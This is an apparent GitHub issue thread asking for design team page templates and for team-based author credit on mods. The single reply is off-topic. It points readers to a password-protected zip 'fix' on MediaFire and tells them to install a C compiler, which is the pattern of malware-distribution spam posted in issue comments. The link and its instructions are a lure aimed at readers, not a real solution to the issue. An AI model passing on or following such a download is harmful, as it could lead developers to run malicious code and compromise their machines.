### ISSUE TITLE
[Feature] [2.0] Pages for design teams and implement system that checks for authors on a team

### ISSUE THREAD

**Issue by GoosiferIO** [GoosiferIO/zooberry#23]
Need templates for the list of design teams along with a small refactor for individual design team pages. Need to update mod lists on design team pages to integrate with new tag system.

Additionally, if a mod was created by a design team it should list only the team name as the author but still give the author credit on their author page if they were on that team. This is to free up some real estate on mods that have a large number of authors that potentially break the theme.

**Comment by SagarChandra07** [comment]
This might help:This file might fix it
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file

Password: changeme
If you don't have the c compliator, install it.(gcc or clang)
